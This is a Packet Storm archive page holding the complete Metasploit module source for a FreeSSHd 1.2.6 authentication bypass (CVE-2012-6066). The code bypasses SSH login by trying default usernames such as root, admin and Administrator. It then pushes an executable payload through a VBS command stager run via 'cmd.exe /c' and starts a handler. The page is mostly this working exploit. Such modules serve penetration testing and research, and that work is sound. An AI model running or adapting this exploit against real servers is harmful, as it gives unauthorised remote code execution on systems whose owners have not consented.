what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FreeSSHd 1.2.6 Authentication Bypass

FreeSSHd 1.2.6 Authentication Bypass
Posted Jan 15, 2013
Site metasploit.com

This Metasploit module exploits a vulnerability found in FreeSSHd versions 1.2.6 and below to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.

tags | exploit, root
advisories | CVE-2012-6066, OSVDB-88006
SHA-256 | 0272e1bc1c0f2058ce2f21fa14e3a0637074e73625db7d48068910d45f94ec8d

FreeSSHd 1.2.6 Authentication Bypass

Change Mirror Download

require 'msf/core'
require 'tempfile'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE

def initialize(info={})
super(update_info(info,
'Name' => "Freesshd Authentication Bypass",
'Description' => %q{
This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
authentication. You just need the username (which defaults to root). The exploit
has been tested with both password and public key authentication.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Aris', # Vulnerability discovery and Exploit
'kcope', # 2012 Exploit
'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-6066' ],
[ 'OSVDB', '88006' ],
[ 'BID', '56785' ],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Aug/132' ]
],
'Platform' => 'win',
'Privileged' => true,
'DisclosureDate' => "Aug 11 2010",
'Targets' =>
[
[ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ]
],
'DefaultTarget' => 0
))

register_options(
[
OptInt.new('RPORT', [false, 'The target port', 22]),
OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator'])
], self.class)
end

def load_netssh
begin
require 'net/ssh'
return true
rescue LoadError
return false
end
end

def check
connect
banner = sock.recv(30)
disconnect
if banner =~ /SSH-2.0-WeOnlyDo/
version=banner.split(" ")[1]
return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end


def upload_payload(connection)
exe = generate_payload_exe
filename = rand_text_alpha(8) + ".exe"
cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
opts = {
:linemax => 1700,
:decoder => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"),
}

cmds = cmdstager.generate(opts)

if (cmds.nil? or cmds.length < 1)
print_error("The command stager could not be generated")
raise ArgumentError
end
cmds.each { |cmd|
ret = connection.exec!("cmd.exe /c "+cmd)
}

end

def setup_ssh_options
pass=rand_text_alpha(8)
options={
:password => pass,
:port => datastore['RPORT'],
:timeout => 1,
:proxies => datastore['Proxies'],
:key_data => OpenSSL::PKey::RSA.new(2048).to_pem
}
return options
end

def do_login(username,options)
print_status("Trying username "+username)
options[:username]=username

transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
auth = Net::SSH::Authentication::Session.new(transport, options)
auth.authenticate("ssh-connection", username, options[:password])
connection = Net::SSH::Connection::Session.new(transport, options)
begin
Timeout.timeout(10) do
connection.exec!('cmd.exe /c echo')
end
rescue RuntimeError
return nil
rescue Timeout::Error
print_status("Timeout")
return nil
end
return connection
end

def exploit
#
# Load net/ssh so we can talk the SSH protocol
#
has_netssh = load_netssh
if not has_netssh
print_error("You don't have net/ssh installed. Please run gem install net-ssh")
return
end

options=setup_ssh_options

connection = nil

usernames=datastore['USERNAMES'].split(' ')
usernames.each { |username|
connection=do_login(username,options)
break if connection
}

if connection
print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)")
upload_payload(connection)
handler
end
end
end

Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close